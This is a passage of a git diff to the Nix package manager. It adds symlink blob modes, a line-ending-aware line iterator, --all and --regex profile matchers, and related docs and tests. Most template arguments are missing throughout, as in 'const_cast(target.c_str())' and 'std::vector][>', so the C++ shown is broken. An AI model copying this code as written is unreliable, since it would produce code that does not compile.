+ crf(buf);
+ left -= buf.size();
+ }
+ });
+ };
+
+ switch (blobMode) {
+
+ case BlobMode::Regular:
+ doRegularFile(false);
+ break;
+
+ case BlobMode::Executable:
+ doRegularFile(true);
+ break;
+
+ case BlobMode::Symlink:
+ {
+ std::string target;
+ target.resize(size, '0');
+ target.reserve(size);
+ for (size_t n = 0; n < target.size();) {
checkInterrupt();
- buf.resize(std::min((unsigned long long)buf.capacity(), left));
- source(buf);
- crf(buf);
- left -= buf.size();
+ n += source.read(
+ const_cast(target.c_str()) + n,
+ target.size() - n);
}
- });
+
+ sink.createSymlink(sinkPath, target);
+ break;
+ }
+
+ default:
+ assert(false);
+ }
}
void parseTree(
@@ -142,7 +174,7 @@ void parse(
FileSystemObjectSink & sink,
const Path & sinkPath,
Source & source,
- bool executable,
+ BlobMode rootModeIfBlob,
std::function hook,
const ExperimentalFeatureSettings & xpSettings)
{
@@ -152,7 +184,7 @@ void parse(
switch (type) {
case ObjectType::Blob:
- parseBlob(sink, sinkPath, source, executable, xpSettings);
+ parseBlob(sink, sinkPath, source, rootModeIfBlob, xpSettings);
break;
case ObjectType::Tree:
parseTree(sink, sinkPath, source, hook, xpSettings);
@@ -177,7 +209,7 @@ std::optional convertMode(SourceAccessor::Type type)
void restore(FileSystemObjectSink & sink, Source & source, std::function hook)
{
- parse(sink, "", source, false, [&](Path name, TreeEntry entry) {
+ parse(sink, "", source, BlobMode::Regular, [&](Path name, TreeEntry entry) {
auto [accessor, from] = hook(entry.hash);
auto stat = accessor->lstat(from);
auto gotOpt = convertMode(stat.type);
@@ -275,6 +307,13 @@ Mode dump(
}
case SourceAccessor::tSymlink:
+ {
+ auto target = accessor.readLink(path);
+ dumpBlobPrefix(target.size(), sink, xpSettings);
+ sink(target);
+ return Mode::Symlink;
+ }
+
case SourceAccessor::tMisc:
default:
throw Error("file '%1%' has an unsupported type", path);
diff --git a/src/libutil/git.hh b/src/libutil/git.hh
index d9eb138e1..cfea48fbe 100644
--- a/src/libutil/git.hh
+++ b/src/libutil/git.hh
@@ -75,10 +75,23 @@ ObjectType parseObjectType(
Source & source,
const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
+/**
+ * These 3 modes are represented by blob objects.
+ *
+ * Sometimes we need this information to disambiguate how a blob is
+ * being used to better match our own "file system object" data model.
+ */
+enum struct BlobMode : RawMode
+{
+ Regular = static_cast(Mode::Regular),
+ Executable = static_cast(Mode::Executable),
+ Symlink = static_cast(Mode::Symlink),
+};
+
void parseBlob(
FileSystemObjectSink & sink, const Path & sinkPath,
Source & source,
- bool executable,
+ BlobMode blobMode,
const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
void parseTree(
@@ -89,11 +102,15 @@ void parseTree(
/**
* Helper putting the previous three `parse*` functions together.
+ *
+ * @rootModeIfBlob How to interpret a root blob, for which there is no
+ * disambiguating dir entry to answer that questino. If the root it not
+ * a blob, this is ignored.
*/
void parse(
FileSystemObjectSink & sink, const Path & sinkPath,
Source & source,
- bool executable,
+ BlobMode rootModeIfBlob,
std::function hook,
const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
diff --git a/src/libutil/position.cc b/src/libutil/position.cc
index b39a5a1d4..724e560b7 100644
--- a/src/libutil/position.cc
+++ b/src/libutil/position.cc
@@ -29,32 +29,17 @@ std::optional Pos::getCodeLines() const
return std::nullopt;
if (auto source = getSource()) {
-
- std::istringstream iss(*source);
- // count the newlines.
- int count = 0;
- std::string curLine;
- int pl = line - 1;
-
+ LinesIterator lines(*source), end;
LinesOfCode loc;
- do {
- std::getline(iss, curLine);
- ++count;
- if (count < pl)
- ;
- else if (count == pl) {
- loc.prevLineOfCode = curLine;
- } else if (count == pl + 1) {
- loc.errLineOfCode = curLine;
- } else if (count == pl + 2) {
- loc.nextLineOfCode = curLine;
- break;
- }
-
- if (!iss.good())
- break;
- } while (true);
+ if (line > 1)
+ std::advance(lines, line - 2);
+ if (lines != end && line > 1)
+ loc.prevLineOfCode = *lines++;
+ if (lines != end)
+ loc.errLineOfCode = *lines++;
+ if (lines != end)
+ loc.nextLineOfCode = *lines++;
return loc;
}
@@ -109,4 +94,26 @@ std::ostream & operator<<(std::ostream & str, const Pos & pos)
return str;
}
+void Pos::LinesIterator::bump(bool atFirst)
+{
+ if (!atFirst) {
+ pastEnd = input.empty();
+ if (!input.empty() && input[0] == '\r')
+ input.remove_prefix(1);
+ if (!input.empty() && input[0] == '\n')
+ input.remove_prefix(1);
+ }
+
+ // nix line endings are not only \n as eg std::getline assumes, but also
+ // \r\n **and \r alone**. not treating them all the same causes error
+ // reports to not match with line numbers as the parser expects them.
+ auto eol = input.find_first_of("\r\n");
+
+ if (eol > input.size())
+ eol = input.size();
+
+ curLine = input.substr(0, eol);
+ input.remove_prefix(eol);
+}
+
}
diff --git a/src/libutil/position.hh b/src/libutil/position.hh
index a184997ed..9bdf3b4b5 100644
--- a/src/libutil/position.hh
+++ b/src/libutil/position.hh
@@ -67,6 +67,48 @@ struct Pos
bool operator==(const Pos & rhs) const = default;
bool operator!=(const Pos & rhs) const = default;
bool operator<(const Pos & rhs) const;
+
+ struct LinesIterator {
+ using difference_type = size_t;
+ using value_type = std::string_view;
+ using reference = const std::string_view &;
+ using pointer = const std::string_view *;
+ using iterator_category = std::input_iterator_tag;
+
+ LinesIterator(): pastEnd(true) {}
+ explicit LinesIterator(std::string_view input): input(input), pastEnd(input.empty()) {
+ if (!pastEnd)
+ bump(true);
+ }
+
+ LinesIterator & operator++() {
+ bump(false);
+ return *this;
+ }
+ LinesIterator operator++(int) {
+ auto result = *this;
+ ++*this;
+ return result;
+ }
+
+ reference operator*() const { return curLine; }
+ pointer operator->() const { return &curLine; }
+
+ bool operator!=(const LinesIterator & other) const {
+ return !(*this == other);
+ }
+ bool operator==(const LinesIterator & other) const {
+ return (pastEnd && other.pastEnd)
+ || (std::forward_as_tuple(input.size(), input.data())
+ == std::forward_as_tuple(other.input.size(), other.input.data()));
+ }
+
+ private:
+ std::string_view input, curLine;
+ bool pastEnd = false;
+
+ void bump(bool atFirst);
+ };
};
std::ostream & operator<<(std::ostream & str, const Pos & pos);
diff --git a/src/libutil/posix-source-accessor.cc b/src/libutil/posix-source-accessor.cc
index f8ec7fc6b..41c2db59a 100644
--- a/src/libutil/posix-source-accessor.cc
+++ b/src/libutil/posix-source-accessor.cc
@@ -85,16 +85,20 @@ bool PosixSourceAccessor::pathExists(const CanonPath & path)
std::optional PosixSourceAccessor::cachedLstat(const CanonPath & path)
{
- static Sync>> _cache;
+ static Sync>> _cache;
+
+ // Note: we convert std::filesystem::path to Path because the
+ // former is not hashable on libc++.
+ Path absPath = makeAbsPath(path);
{
auto cache(_cache.lock());
- auto i = cache->find(path);
+ auto i = cache->find(absPath);
if (i != cache->end()) return i->second;
}
std::optional st{std::in_place};
- if (::lstat(makeAbsPath(path).c_str(), &*st)) {
+ if (::lstat(absPath.c_str(), &*st)) {
if (errno == ENOENT || errno == ENOTDIR)
st.reset();
else
@@ -103,7 +107,7 @@ std::optional PosixSourceAccessor::cachedLstat(const CanonPath & pa
auto cache(_cache.lock());
if (cache->size() >= 16384) cache->clear();
- cache->emplace(path, st);
+ cache->emplace(absPath, st);
return st;
}
diff --git a/src/libutil/util.cc b/src/libutil/util.cc
index 75bb31c9b..06124bf15 100644
--- a/src/libutil/util.cc
+++ b/src/libutil/util.cc
@@ -9,6 +9,10 @@
#include
+#ifdef NDEBUG
+#error "Nix may not be built with assertions disabled (i.e. with -DNDEBUG)."
+#endif
+
namespace nix {
void initLibUtil() {
diff --git a/src/nix/copy.md b/src/nix/copy.md
index 199006436..6ab7cdee3 100644
--- a/src/nix/copy.md
+++ b/src/nix/copy.md
@@ -11,6 +11,12 @@ R""(
Note the `file://` - without this, the destination is a chroot
store, not a binary cache.
+* Copy all store paths from a local binary cache in `/tmp/cache` to the local store:
+
+ ```console
+ # nix copy --all --from file:///tmp/cache
+ ```
+
* Copy the entire current NixOS system closure to another machine via
SSH:
diff --git a/src/nix/eval.cc b/src/nix/eval.cc
index 2044c8c2b..088be3b17 100644
--- a/src/nix/eval.cc
+++ b/src/nix/eval.cc
@@ -120,8 +120,17 @@ struct CmdEval : MixJSON, InstallableValueCommand, MixReadOnlyOption
}
else {
- state->forceValueDeep(*v);
- logger->cout("%s", ValuePrinter(*state, *v, PrintOptions { .force = true }));
+ logger->cout(
+ "%s",
+ ValuePrinter(
+ *state,
+ *v,
+ PrintOptions {
+ .force = true,
+ .derivationPaths = true
+ }
+ )
+ );
}
}
};
diff --git a/src/nix/flake.cc b/src/nix/flake.cc
index 131589f35..a846f6371 100644
--- a/src/nix/flake.cc
+++ b/src/nix/flake.cc
@@ -88,17 +88,19 @@ public:
expectArgs({
.label="inputs",
.optional=true,
- .handler={[&](std::string inputToUpdate){
- InputPath inputPath;
- try {
- inputPath = flake::parseInputPath(inputToUpdate);
- } catch (Error & e) {
- warn("Invalid flake input '%s'. To update a specific flake, use 'nix flake update --flake %s' instead.", inputToUpdate, inputToUpdate);
- throw e;
+ .handler={[&](std::vector inputsToUpdate){
+ for (auto inputToUpdate : inputsToUpdate) {
+ InputPath inputPath;
+ try {
+ inputPath = flake::parseInputPath(inputToUpdate);
+ } catch (Error & e) {
+ warn("Invalid flake input '%s'. To update a specific flake, use 'nix flake update --flake %s' instead.", inputToUpdate, inputToUpdate);
+ throw e;
+ }
+ if (lockFlags.inputUpdates.contains(inputPath))
+ warn("Input '%s' was specified multiple times. You may have done this by accident.");
+ lockFlags.inputUpdates.insert(inputPath);
}
- if (lockFlags.inputUpdates.contains(inputPath))
- warn("Input '%s' was specified multiple times. You may have done this by accident.");
- lockFlags.inputUpdates.insert(inputPath);
}},
.completer = {[&](AddCompletions & completions, size_t, std::string_view prefix) {
completeFlakeInputPath(completions, getEvalState(), getFlakeRefsForCompletion(), prefix);
@@ -205,6 +207,9 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
auto lockedFlake = lockFlake();
auto & flake = lockedFlake.flake;
+ // Currently, all flakes are in the Nix store via the rootFS accessor.
+ auto storePath = store->printStorePath(store->toStorePath(flake.path.path.abs()).first);
+
if (json) {
nlohmann::json j;
if (flake.description)
@@ -214,6 +219,8 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
j["resolvedUrl"] = flake.resolvedRef.to_string();
j["resolved"] = fetchers::attrsToJSON(flake.resolvedRef.toAttrs());
j["url"] = flake.lockedRef.to_string(); // FIXME: rename to lockedUrl
+ // "locked" is a misnomer - this is the result of the
+ // attempt to lock.
j["locked"] = fetchers::attrsToJSON(flake.lockedRef.toAttrs());
if (auto rev = flake.lockedRef.input.getRev())
j["revision"] = rev->to_string(HashFormat::Base16, false);
@@ -223,23 +230,24 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
j["revCount"] = *revCount;
if (auto lastModified = flake.lockedRef.input.getLastModified())
j["lastModified"] = *lastModified;
- j["path"] = store->printStorePath(flake.storePath);
+ j["path"] = storePath;
j["locks"] = lockedFlake.lockFile.toJSON().first;
logger->cout("%s", j.dump());
} else {
logger->cout(
ANSI_BOLD "Resolved URL:" ANSI_NORMAL " %s",
flake.resolvedRef.to_string());
- logger->cout(
- ANSI_BOLD "Locked URL:" ANSI_NORMAL " %s",
- flake.lockedRef.to_string());
+ if (flake.lockedRef.input.isLocked())
+ logger->cout(
+ ANSI_BOLD "Locked URL:" ANSI_NORMAL " %s",
+ flake.lockedRef.to_string());
if (flake.description)
logger->cout(
ANSI_BOLD "Description:" ANSI_NORMAL " %s",
*flake.description);
logger->cout(
ANSI_BOLD "Path:" ANSI_NORMAL " %s",
- store->printStorePath(flake.storePath));
+ storePath);
if (auto rev = flake.lockedRef.input.getRev())
logger->cout(
ANSI_BOLD "Revision:" ANSI_NORMAL " %s",
@@ -474,6 +482,8 @@ struct CmdFlakeCheck : FlakeCommand
checkHydraJobs = [&](const std::string & attrPath, Value & v, const PosIdx pos) {
try {
+ Activity act(*logger, lvlInfo, actUnknown,
+ fmt("checking Hydra job '%s'", attrPath));
state->forceAttrs(v, pos, "");
if (state->isDerivation(v))
@@ -1031,7 +1041,9 @@ struct CmdFlakeArchive : FlakeCommand, MixJSON, MixDryRun
StorePathSet sources;
- sources.insert(flake.flake.storePath);
+ auto storePath = store->toStorePath(flake.flake.path.path.abs()).first;
+
+ sources.insert(storePath);
// FIXME: use graph output, handle cycles.
std::function traverse;
@@ -1043,7 +1055,7 @@ struct CmdFlakeArchive : FlakeCommand, MixJSON, MixDryRun
auto storePath =
dryRun
? (*inputNode)->lockedRef.input.computeStorePath(*store)
- : (*inputNode)->lockedRef.input.fetch(store).first;
+ : (*inputNode)->lockedRef.input.fetchToStore(store).first;
if (json) {
auto& jsonObj3 = jsonObj2[inputName];
jsonObj3["path"] = store->printStorePath(storePath);
@@ -1060,7 +1072,7 @@ struct CmdFlakeArchive : FlakeCommand, MixJSON, MixDryRun
if (json) {
nlohmann::json jsonRoot = {
- {"path", store->printStorePath(flake.flake.storePath)},
+ {"path", store->printStorePath(storePath)},
{"inputs", traverse(*flake.lockFile.root)},
};
logger->cout("%s", jsonRoot);
diff --git a/src/nix/profile-remove.md b/src/nix/profile-remove.md
index 1f6532250..e7e5e0dfb 100644
--- a/src/nix/profile-remove.md
+++ b/src/nix/profile-remove.md
@@ -11,9 +11,16 @@ R""(
* Remove all packages:
```console
- # nix profile remove '.*'
+ # nix profile remove --all
```
+* Remove packages by regular expression:
+
+ ```console
+ # nix profile remove --regex '.*vim.*'
+ ```
+
+
* Remove a package by store path:
```console
diff --git a/src/nix/profile-upgrade.md b/src/nix/profile-upgrade.md
index 432b8fa94..da7a668db 100644
--- a/src/nix/profile-upgrade.md
+++ b/src/nix/profile-upgrade.md
@@ -6,7 +6,7 @@ R""(
reference:
```console
- # nix profile upgrade '.*'
+ # nix profile upgrade --all
```
* Upgrade a specific package by name:
@@ -15,6 +15,12 @@ R""(
# nix profile upgrade hello
```
+* Upgrade all packages that include 'vim' in their name:
+
+ ```console
+ # nix profile upgrade --regex '.*vim.*'
+ ```
+
# Description
This command upgrades a previously installed package in a Nix profile,
diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index d39a24d36..a5a40e4f6 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -222,6 +222,8 @@ struct ProfileManifest
es[name] = obj;
}
nlohmann::json json;
+ // Only upgrade with great care as changing it can break fresh installs
+ // like in https://github.com/NixOS/nix/issues/10109
json["version"] = 3;
json["elements"] = es;
return json;
@@ -477,55 +479,151 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile
}
};
-class MixProfileElementMatchers : virtual Args
+struct Matcher
{
- std::vector _matchers;
+ virtual ~Matcher() { }
+ virtual std::string getTitle() = 0;
+ virtual bool matches(const std::string & name, const ProfileElement & element) = 0;
+};
+
+struct RegexMatcher final : public Matcher
+{
+ std::regex regex;
+ std::string pattern;
+
+ RegexMatcher(const std::string & pattern) : regex(pattern, std::regex::extended | std::regex::icase), pattern(pattern)
+ { }
+
+ std::string getTitle() override
+ {
+ return fmt("Regex '%s'", pattern);
+ }
+
+ bool matches(const std::string & name, const ProfileElement & element) override
+ {
+ return std::regex_match(element.identifier(), regex);
+ }
+};
+
+struct StorePathMatcher final : public Matcher
+{
+ nix::StorePath storePath;
+
+ StorePathMatcher(const nix::StorePath & storePath) : storePath(storePath)
+ { }
+
+ std::string getTitle() override
+ {
+ return fmt("Store path '%s'", storePath.to_string());
+ }
+
+ bool matches(const std::string & name, const ProfileElement & element) override
+ {
+ return element.storePaths.count(storePath);
+ }
+};
+
+struct NameMatcher final : public Matcher
+{
+ std::string name;
+
+ NameMatcher(const std::string & name) : name(name)
+ { }
+
+ std::string getTitle() override
+ {
+ return fmt("Package name '%s'", name);
+ }
+
+ bool matches(const std::string & name, const ProfileElement & element) override
+ {
+ return name == this->name;
+ }
+};
+
+struct AllMatcher final : public Matcher
+{
+ std::string getTitle() override
+ {
+ return "--all";
+ }
+
+ bool matches(const std::string & name, const ProfileElement & element) override
+ {
+ return true;
+ }
+};
+
+AllMatcher all;
+
+class MixProfileElementMatchers : virtual Args, virtual StoreCommand
+{
+ std::vector][> _matchers;
public:
MixProfileElementMatchers()
{
- expectArgs("elements", &_matchers);
+ addFlag({
+ .longName = "all",
+ .description = "Match all packages in the profile.",
+ .handler = {[this]() {
+ _matchers.push_back(ref(std::shared_ptr(&all, [](AllMatcher*) {})));
+ }},
+ });
+ addFlag({
+ .longName = "regex",
+ .description = "A regular expression to match one or more packages in the profile.",
+ .labels = {"pattern"},
+ .handler = {[this](std::string arg) {
+ _matchers.push_back(make_ref(arg));
+ }},
+ });
+ expectArgs({
+ .label = "elements",
+ .optional = true,
+ .handler = {[this](std::vector args) {
+ for (auto & arg : args) {
+ if (auto n = string2Int(arg)) {
+ throw Error("'nix profile' no longer supports indices ('%d')", *n);
+ } else if (getStore()->isStorePath(arg)) {
+ _matchers.push_back(make_ref(getStore()->parseStorePath(arg)));
+ } else {
+ _matchers.push_back(make_ref(arg));
+ }
+ }
+ }}
+ });
}
- struct RegexPattern {
- std::string pattern;
- std::regex reg;
- };
- typedef std::variant Matcher;
-
- std::vector getMatchers(ref store)
- {
- std::vector res;
-
- for (auto & s : _matchers) {
- if (auto n = string2Int(s))
- throw Error("'nix profile' no longer supports indices ('%d')", *n);
- else if (store->isStorePath(s))
- res.push_back(s);
- else
- res.push_back(RegexPattern{s,std::regex(s, std::regex::extended | std::regex::icase)});
+ std::set getMatchingElementNames(ProfileManifest & manifest) {
+ if (_matchers.empty()) {
+ throw UsageError("No packages specified.");
}
- return res;
- }
+ if (std::find_if(_matchers.begin(), _matchers.end(), [](const ref & m) { return m.dynamic_pointer_cast(); }) != _matchers.end() && _matchers.size() > 1) {
+ throw UsageError("--all cannot be used with package names or regular expressions.");
+ }
- bool matches(
- const Store & store,
- const std::string & name,
- const ProfileElement & element,
- const std::vector & matchers)
- {
- for (auto & matcher : matchers) {
- if (auto path = std::get_if(&matcher)) {
- if (element.storePaths.count(store.parseStorePath(*path))) return true;
- } else if (auto regex = std::get_if(&matcher)) {
- if (std::regex_match(name, regex->reg))
- return true;
+ if (manifest.elements.empty()) {
+ warn("There are no packages in the profile.");
+ return {};
+ }
+
+ std::set result;
+ for (auto & matcher : _matchers) {
+ bool foundMatch = false;
+ for (auto & [name, element] : manifest.elements) {
+ if (matcher->matches(name, element)) {
+ result.insert(name);
+ foundMatch = true;
+ }
+ }
+ if (!foundMatch) {
+ warn("%s does not match any packages in the profile.", matcher->getTitle());
}
}
-
- return false;
+ return result;
}
};
@@ -547,16 +645,19 @@ struct CmdProfileRemove : virtual EvalCommand, MixDefaultProfile, MixProfileElem
{
ProfileManifest oldManifest(*getEvalState(), *profile);
- auto matchers = getMatchers(store);
+ ProfileManifest newManifest = oldManifest;
- ProfileManifest newManifest;
+ auto matchingElementNames = getMatchingElementNames(oldManifest);
- for (auto & [name, element] : oldManifest.elements) {
- if (!matches(*store, name, element, matchers)) {
- newManifest.elements.insert_or_assign(name, std::move(element));
- } else {
- notice("removing '%s'", element.identifier());
- }
+ if (matchingElementNames.empty()) {
+ warn ("No packages to remove. Use 'nix profile list' to see the current profile.");
+ return;
+ }
+
+ for (auto & name : matchingElementNames) {
+ auto & element = oldManifest.elements[name];
+ notice("removing '%s'", element.identifier());
+ newManifest.elements.erase(name);
}
auto removedCount = oldManifest.elements.size() - newManifest.elements.size();
@@ -564,16 +665,6 @@ struct CmdProfileRemove : virtual EvalCommand, MixDefaultProfile, MixProfileElem
removedCount,
newManifest.elements.size());
- if (removedCount == 0) {
- for (auto matcher: matchers) {
- if (const Path * path = std::get_if(&matcher)) {
- warn("'%s' does not match any paths", *path);
- } else if (const RegexPattern * regex = std::get_if(&matcher)) {
- warn("'%s' does not match any packages", regex->pattern);
- }
- }
- warn ("Use 'nix profile list' to see the current profile.");
- }
updateProfile(newManifest.build(store));
}
};
@@ -596,20 +687,20 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf
{
ProfileManifest manifest(*getEvalState(), *profile);
- auto matchers = getMatchers(store);
-
Installables installables;
std::vector elems;
- auto matchedCount = 0;
auto upgradedCount = 0;
- for (auto & [name, element] : manifest.elements) {
- if (!matches(*store, name, element, matchers)) {
- continue;
- }
+ auto matchingElementNames = getMatchingElementNames(manifest);
- matchedCount++;
+ if (matchingElementNames.empty()) {
+ warn("No packages to upgrade. Use 'nix profile list' to see the current profile.");
+ return;
+ }
+
+ for (auto & name : matchingElementNames) {
+ auto & element = manifest.elements[name];
if (!element.source) {
warn(
@@ -648,7 +739,9 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf
assert(infop);
auto & info = *infop;
- if (element.source->lockedRef == info.flake.lockedRef) continue;
+ if (info.flake.lockedRef.input.isLocked()
+ && element.source->lockedRef == info.flake.lockedRef)
+ continue;
printInfo("upgrading '%s' from flake '%s' to '%s'",
element.source->attrPath, element.source->lockedRef, info.flake.lockedRef);
@@ -665,18 +758,8 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf
}
if (upgradedCount == 0) {
- if (matchedCount == 0) {
- for (auto & matcher : matchers) {
- if (const Path * path = std::get_if(&matcher)) {
- warn("'%s' does not match any paths", *path);
- } else if (const RegexPattern * regex = std::get_if(&matcher)) {
- warn("'%s' does not match any packages", regex->pattern);
- }
- }
- } else {
- warn("Found some packages but none of them could be upgraded.");
- }
- warn ("Use 'nix profile list' to see the current profile.");
+ warn("Found some packages but none of them could be upgraded.");
+ return;
}
auto builtPaths = builtPathsPerInstallable(
diff --git a/src/nix/registry-pin.md b/src/nix/registry-pin.md
index ebc0e3eff..5ad4f8709 100644
--- a/src/nix/registry-pin.md
+++ b/src/nix/registry-pin.md
@@ -15,10 +15,10 @@ R""(
user flake:nixpkgs github:NixOS/nixpkgs/925b70cd964ceaedee26fde9b19cc4c4f081196a
```
- and `nix flake info` will say:
+ and `nix flake metadata` will say:
```console
- # nix flake info nixpkgs
+ # nix flake metadata nixpkgs
Resolved URL: github:NixOS/nixpkgs/925b70cd964ceaedee26fde9b19cc4c4f081196a
Locked URL: github:NixOS/nixpkgs/925b70cd964ceaedee26fde9b19cc4c4f081196a
…
diff --git a/src/nix/registry.cc b/src/nix/registry.cc
index 0346ec1e0..812429240 100644
--- a/src/nix/registry.cc
+++ b/src/nix/registry.cc
@@ -188,7 +188,9 @@ struct CmdRegistryPin : RegistryCommand, EvalCommand
auto ref = parseFlakeRef(url);
auto lockedRef = parseFlakeRef(locked);
registry->remove(ref.input);
- auto [tree, resolved] = lockedRef.resolve(store).input.fetch(store);
+ auto resolved = lockedRef.resolve(store).input.getAccessor(store).second;
+ if (!resolved.isLocked())
+ warn("flake '%s' is not locked", resolved.to_string());
fetchers::Attrs extraAttrs;
if (ref.subdir != "") extraAttrs["dir"] = ref.subdir;
registry->add(ref.input, resolved, extraAttrs);
diff --git a/tests/functional/common/vars-and-functions.sh.in b/tests/functional/common/vars-and-functions.sh.in
index 8fef29f97..3975986c0 100644
--- a/tests/functional/common/vars-and-functions.sh.in
+++ b/tests/functional/common/vars-and-functions.sh.in
@@ -216,6 +216,17 @@ expectStderr() {
return 0
}
+# Run a command and check whether the stderr matches stdin.
+# Show a diff when output does not match.
+# Usage:
+#
+# assertStderr nix profile remove nothing << EOF
+# error: This error is expected
+# EOF
+assertStderr() {
+ diff -u /dev/stdin <($@ 2>/dev/null 2>&1)
+}
+
needLocalStore() {
if [[ "$NIX_REMOTE" == "daemon" ]]; then
skipTest "Can’t run through the daemon ($1)"
diff --git a/tests/functional/eval.sh b/tests/functional/eval.sh
index b81bb1e2c..c6a475cd0 100644
--- a/tests/functional/eval.sh
+++ b/tests/functional/eval.sh
@@ -41,3 +41,14 @@ mkdir -p $TEST_ROOT/xyzzy $TEST_ROOT/foo
ln -sfn ../xyzzy $TEST_ROOT/foo/bar
printf 123 > $TEST_ROOT/xyzzy/default.nix
[[ $(nix eval --impure --expr "import $TEST_ROOT/foo/bar") = 123 ]]
+
+# Test --arg-from-file.
+[[ "$(nix eval --raw --arg-from-file foo config.nix --expr '{ foo }: { inherit foo; }' foo)" = "$(cat config.nix)" ]]
+
+# Check that special(-ish) files are drained.
+if [[ -e /proc/version ]]; then
+ [[ "$(nix eval --raw --arg-from-file foo /proc/version --expr '{ foo }: { inherit foo; }' foo)" = "$(cat /proc/version)" ]]
+fi
+
+# Test --arg-from-stdin.
+[[ "$(echo bla | nix eval --raw --arg-from-stdin foo --expr '{ foo }: { inherit foo; }' foo)" = bla ]]
diff --git a/tests/functional/flakes/flakes.sh b/tests/functional/flakes/flakes.sh
index 7506b6b3b..427290883 100644
--- a/tests/functional/flakes/flakes.sh
+++ b/tests/functional/flakes/flakes.sh
@@ -564,6 +564,16 @@ nix flake lock "$flake3Dir"
nix flake update flake2/flake1 --flake "$flake3Dir"
[[ $(jq -r .nodes.flake1_2.locked.rev "$flake3Dir/flake.lock") =~ $hash2 ]]
+# Test updating multiple inputs.
+nix flake lock "$flake3Dir" --override-input flake1 flake1/master/$hash1
+nix flake lock "$flake3Dir" --override-input flake2/flake1 flake1/master/$hash1
+[[ $(jq -r .nodes.flake1.locked.rev "$flake3Dir/flake.lock") =~ $hash1 ]]
+[[ $(jq -r .nodes.flake1_2.locked.rev "$flake3Dir/flake.lock") =~ $hash1 ]]
+
+nix flake update flake1 flake2/flake1 --flake "$flake3Dir"
+[[ $(jq -r .nodes.flake1.locked.rev "$flake3Dir/flake.lock") =~ $hash2 ]]
+[[ $(jq -r .nodes.flake1_2.locked.rev "$flake3Dir/flake.lock") =~ $hash2 ]]
+
# Test 'nix flake metadata --json'.
nix flake metadata "$flake3Dir" --json | jq .
diff --git a/tests/functional/flakes/search-root.sh b/tests/functional/flakes/search-root.sh
index d8586dc8a..6b137aa86 100644
--- a/tests/functional/flakes/search-root.sh
+++ b/tests/functional/flakes/search-root.sh
@@ -22,7 +22,7 @@ mkdir subdir
pushd subdir
success=("" . .# .#test ../subdir ../subdir#test "$PWD")
-failure=("path:$PWD")
+failure=("path:$PWD" "../simple.nix")
for i in "${success[@]}"; do
nix build $i || fail "flake should be found by searching up directories"
diff --git a/tests/functional/git-hashing/simple.sh b/tests/functional/git-hashing/simple.sh
index 74b0220f8..604e1a175 100644
--- a/tests/functional/git-hashing/simple.sh
+++ b/tests/functional/git-hashing/simple.sh
@@ -56,3 +56,12 @@ echo Run Hello World! > $TEST_ROOT/dummy3/dir/executable
path3=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy3)
hash3=$(nix-store -q --hash $path3)
test "$hash3" = "sha256:08y3nm3mvn9qvskqnf13lfgax5lh73krxz4fcjd5cp202ggpw9nv"
+
+rm -rf $TEST_ROOT/dummy3
+mkdir -p $TEST_ROOT/dummy3
+mkdir -p $TEST_ROOT/dummy3/dir
+touch $TEST_ROOT/dummy3/dir/file
+ln -s './hello/world.txt' $TEST_ROOT/dummy3/dir/symlink
+path3=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy3)
+hash3=$(nix-store -q --hash $path3)
+test "$hash3" = "sha256:1dwazas8irzpar89s8k2bnp72imfw7kgg4aflhhsfnicg8h428f3"
diff --git a/tests/functional/help.sh b/tests/functional/help.sh
new file mode 100644
index 000000000..868f5d2e9
--- /dev/null
+++ b/tests/functional/help.sh
@@ -0,0 +1,69 @@
+source common.sh
+
+clearStore
+
+# test help output
+
+nix-build --help
+nix-shell --help
+
+nix-env --help
+nix-env --install --help
+nix-env --upgrade --help
+nix-env --uninstall --help
+nix-env --set --help
+nix-env --set-flag --help
+nix-env --query --help
+nix-env --switch-profile --help
+nix-env --list-generations --help
+nix-env --delete-generations --help
+nix-env --switch-generation --help
+nix-env --rollback --help
+
+nix-store --help
+nix-store --realise --help
+nix-store --serve --help
+nix-store --gc --help
+nix-store --delete --help
+nix-store --query --help
+nix-store --add --help
+nix-store --add-fixed --help
+nix-store --verify --help
+nix-store --verify-path --help
+nix-store --repair-path --help
+nix-store --dump --help
+nix-store --restore --help
+nix-store --export --help
+nix-store --import --help
+nix-store --optimise --help
+nix-store --read-log --help
+nix-store --dump-db --help
+nix-store --load-db --help
+nix-store --print-env --help
+nix-store --generate-binary-cache-key --help
+
+nix-channel --help
+nix-collect-garbage --help
+nix-copy-closure --help
+nix-daemon --help
+nix-hash --help
+nix-instantiate --help
+nix-prefetch-url --help
+
+function subcommands() {
+ jq -r '
+def recurse($prefix):
+ to_entries[] |
+ ($prefix + [.key]) as $newPrefix |
+ (if .value | has("commands") then
+ ($newPrefix, (.value.commands | recurse($newPrefix)))
+ else
+ $newPrefix
+ end);
+.args.commands | recurse([]) | join(" ")
+'
+}
+
+nix __dump-cli | subcommands | while IFS= read -r cmd; do
+ nix $cmd --help
+done
diff --git a/tests/functional/lang/eval-fail-eol-1.err.exp b/tests/functional/lang/eval-fail-eol-1.err.exp
new file mode 100644
index 000000000..3f5a5c22c
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-1.err.exp
@@ -0,0 +1,6 @@
+error: undefined variable 'invalid'
+ at /pwd/lang/eval-fail-eol-1.nix:2:1:
+ 1| # foo
+ 2| invalid
+ | ^
+ 3| # bar
diff --git a/tests/functional/lang/eval-fail-eol-1.nix b/tests/functional/lang/eval-fail-eol-1.nix
new file mode 100644
index 000000000..476223919
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-1.nix
@@ -0,0 +1,3 @@
+# foo
+invalid
+# bar
diff --git a/tests/functional/lang/eval-fail-eol-2.err.exp b/tests/functional/lang/eval-fail-eol-2.err.exp
new file mode 100644
